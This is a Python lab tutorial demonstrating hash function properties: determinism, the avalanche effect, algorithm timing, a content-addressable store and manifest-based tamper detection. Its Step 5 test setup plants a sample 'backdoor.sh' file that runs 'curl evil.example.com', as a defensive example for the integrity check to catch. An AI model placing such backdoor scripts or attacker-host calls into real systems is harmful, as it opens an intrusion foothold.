← Cryptography Fundamentals
Lab

Lab: Hash Functions in Practice

20 min Python

Goal

Write a Python program that demonstrates the core properties of cryptographic hash functions: determinism, the avalanche effect, performance differences between algorithms, content-addressable storage, and tamper detection.

Setup

You need Python 3.8 or later. No external packages are required – this lab uses only the standard library hashlib and time modules.

Create a file called hashing_lab.py.

Step 1: Hash a String with SHA-256

Start by hashing a simple string and inspecting the output.

import hashlib

message = b"Cryptography is the practice of secure communication."
digest = hashlib.sha256(message).hexdigest()

print(f"Input:  {message.decode()}")
print(f"SHA-256: {digest}")
print(f"Digest length: {len(digest)} hex chars = {len(digest) * 4} bits")

Run the program:

python3 hashing_lab.py
Input:  Cryptography is the practice of secure communication.
SHA-256: a0521af882e7e05ab8857f84e498e28c87b6909812bdef9564c31b4658e4986b
Digest length: 64 hex chars = 256 bits

The output is always 64 hexadecimal characters (256 bits) regardless of input size. Run it again – the hash is identical. Same input, same output, every time.

Step 2: Demonstrate the Avalanche Effect

Change a single character in the input and compare the two hashes.

import hashlib

original = b"Cryptography is the practice of secure communication."
modified = b"Cryptography is the practice of secure communication!"

hash_original = hashlib.sha256(original).hexdigest()
hash_modified = hashlib.sha256(modified).hexdigest()

print(f"Original: {hash_original}")
print(f"Modified: {hash_modified}")

# Count differing hex characters
diff_count = sum(1 for a, b in zip(hash_original, hash_modified) if a != b)
print(f"Differing hex chars: {diff_count} / {len(hash_original)}")

# Count differing bits
original_bits = bin(int(hash_original, 16))[2:].zfill(256)
modified_bits = bin(int(hash_modified, 16))[2:].zfill(256)
bit_diff = sum(1 for a, b in zip(original_bits, modified_bits) if a != b)
print(f"Differing bits: {bit_diff} / 256 ({bit_diff / 256 * 100:.1f}%)")
Original: a0521af882e7e05ab8857f84e498e28c87b6909812bdef9564c31b4658e4986b
Modified: 6fda8d077c6933acbc8e86c2e1efc42da3dbde21e40f2c7c1c0e9c5ae5f3e793
Differing hex chars: 62 / 64
Differing bits: 133 / 256 (52.0%)

Changing a period to an exclamation mark – a single character – flips roughly half the bits. There is no observable relationship between similar inputs and their hashes. This is the avalanche effect.

Step 3: Compare Algorithm Performance

Time how long each algorithm takes to hash a 10 MB block of data.

import hashlib
import time

data = b"A" * (10 * 1024 * 1024)  # 10 MB
algorithms = ["md5", "sha256", "sha3_256"]

print(f"Hashing {len(data) // (1024 * 1024)} MB with each algorithm:\n")

for algo in algorithms:
    h = hashlib.new(algo)
    start = time.perf_counter()
    h.update(data)
    digest = h.hexdigest()
    elapsed = time.perf_counter() - start
    throughput = len(data) / elapsed / (1024 * 1024)
    print(f"{algo:>10}: {elapsed:.4f}s  ({throughput:.0f} MB/s)  digest={digest[:16]}...")
Hashing 10 MB with each algorithm:

       md5: 0.0082s  (1220 MB/s)  digest=a27e5f34b8191de4...
    sha256: 0.0134s  (746 MB/s)  digest=4b5f65a98b3a88f6...
  sha3_256: 0.0228s  (439 MB/s)  digest=0c38e0f8f4e5a3d6...

Exact numbers vary by machine, but the relative order is consistent: MD5 is fastest (and broken), SHA-256 is the standard middle ground, and SHA-3 is slowest (different internal construction). Speed is not a reason to choose MD5 – security is the deciding factor.

Step 4: Build a Content-Addressable Store

Use hash values as filenames to create a simple content-addressable store, similar to how git stores objects.

import hashlib
import os
import tempfile

store_dir = tempfile.mkdtemp(prefix="cas_")
print(f"Store directory: {store_dir}\n")


def store(content: bytes) -> str:
    """Store content and return its hash key."""
    key = hashlib.sha256(content).hexdigest()
    path = os.path.join(store_dir, key)
    if not os.path.exists(path):
        with open(path, "wb") as f:
            f.write(content)
        print(f"  Stored new object: {key[:16]}...")
    else:
        print(f"  Already exists:    {key[:16]}...")
    return key


def retrieve(key: str) -> bytes:
    """Retrieve content by hash key."""
    path = os.path.join(store_dir, key)
    with open(path, "rb") as f:
        return f.read()


# Store three pieces of content, one of which is a duplicate
k1 = store(b"First document content.")
k2 = store(b"Second document content.")
k3 = store(b"First document content.")  # duplicate

print(f"\nk1 == k3: {k1 == k3}")
print(f"Unique objects in store: {len(os.listdir(store_dir))}")

# Retrieve and verify
retrieved = retrieve(k1)
print(f"Retrieved: {retrieved.decode()}")
Store directory: /tmp/cas_xxxxxxxx

  Stored new object: 8b3a4e5c1f2d7a90...
  Stored new object: 3d92f1a7b6c8e054...
  Already exists:    8b3a4e5c1f2d7a90...

k1 == k3: True
Unique objects in store: 2
Retrieved: First document content.

Identical content always produces the same hash, so duplicates are automatically deduplicated. This is the same principle behind git object storage and Docker image layers.

Step 5: Detect File Tampering

Compute a hash manifest for a set of files, then detect when a file is modified.

import hashlib
import os
import tempfile


def hash_file(path: str) -> str:
    """Compute SHA-256 hash of a file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(directory: str) -> dict:
    """Build a hash manifest for all files in a directory."""
    manifest = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            manifest[name] = hash_file(path)
    return manifest


def verify_manifest(directory: str, manifest: dict) -> list:
    """Check files against a manifest. Return list of problems."""
    problems = []
    current_files = set()
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            current_files.add(name)
            if name not in manifest:
                problems.append(f"  NEW:      {name}")
            elif hash_file(path) != manifest[name]:
                problems.append(f"  MODIFIED: {name}")
    for name in manifest:
        if name not in current_files:
            problems.append(f"  DELETED:  {name}")
    return problems


# Set up test directory with files
test_dir = tempfile.mkdtemp(prefix="integrity_")
for name, content in [("config.txt", b"port=8080"), ("data.csv", b"a,b,c\n1,2,3")]:
    with open(os.path.join(test_dir, name), "wb") as f:
        f.write(content)

# Build initial manifest
manifest = build_manifest(test_dir)
print("Initial manifest:")
for name, digest in manifest.items():
    print(f"  {name}: {digest[:16]}...")

# Tamper with a file
with open(os.path.join(test_dir, "config.txt"), "wb") as f:
    f.write(b"port=9999")

# Add a new file
with open(os.path.join(test_dir, "backdoor.sh"), "wb") as f:
    f.write(b"#!/bin/sh\ncurl evil.example.com")

# Verify
print("\nVerification after tampering:")
problems = verify_manifest(test_dir, manifest)
if problems:
    print("  Integrity check FAILED:")
    for p in problems:
        print(p)
else:
    print("  All files OK.")
Initial manifest:
  config.txt: 3a7d8b2e1f4c6590...
  data.csv: 9e1f3a5b7d2c8046...

Verification after tampering:
  Integrity check FAILED:
  NEW:      backdoor.sh
  MODIFIED: config.txt

The manifest detected both the modified file and the unauthorized new file. This is the same principle behind Subresource Integrity (SRI) in browsers and package manager checksums.

Summary

This lab demonstrated five properties of cryptographic hash functions using standard Python: